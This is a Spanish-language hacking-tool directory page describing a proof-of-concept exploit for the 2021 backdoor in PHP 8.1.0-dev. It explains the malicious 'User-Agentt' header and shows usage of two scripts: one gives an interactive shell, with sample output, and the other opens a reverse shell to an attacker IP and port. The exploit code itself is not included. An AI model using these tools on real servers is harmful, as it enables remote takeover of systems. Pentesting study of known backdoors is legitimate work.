Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
php-8.1.0-dev-backdoor-rce — Script de shell del sistema con puerta trasera para PHP 8.1.0-dev | Kitploit
Herramientas/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

Script de shell del sistema con puerta trasera para PHP 8.1.0-dev

Ver Repositorio
9421hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ejecución remota de código mediante backdoor en PHP 8.1.0-dev

Script de shell del sistema con backdoor para PHP 8.1.0-dev

docs/logo_php81.png

La versión de PHP 8.1.0-dev se publicó con un backdoor el 28 de marzo de 2021, pero el backdoor fue rápidamente descubierto y eliminado. Si esta versión de PHP se ejecuta en un servidor, un atacante puede ejecutar código arbitrario enviando la cabecera User-Agentt.

El código original se restauró después de descubrirse el problema, pero luego fue manipulado por segunda vez. La brecha habría creado un backdoor en cualquier sitio web que ejecutara la versión comprometida de PHP, permitiendo a los atacantes realizar ejecución remota de código en el sitio.

Leer el artículo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


Script de POC

Este breve script de exploit backdoor_php_8.1.0-dev.py utiliza el backdoor para proporcionar una pseudo shell del sistema en el host. Encuéntralo en Exploit DB.

  • Título del exploit: Ejecución remota de código mediante backdoor en PHP 8.1.0-dev
  • Fecha: 23 de mayo de 2021
  • Autor del exploit: flast101
  • Página del proveedor: https://www.php.net/
  • Enlace del software: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Probado en la versión: 8.1.0-dev
  • CVE : N/A
  • Referencias de vulnerabilidad:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Uso:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Shell inversa

Este breve script de exploit revshell_php_8.1.0-dev.py proporciona una shell inversa en el objetivo.

Uso:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

¡Sé curioso, aprender es vida! 😃

Descargar herramienta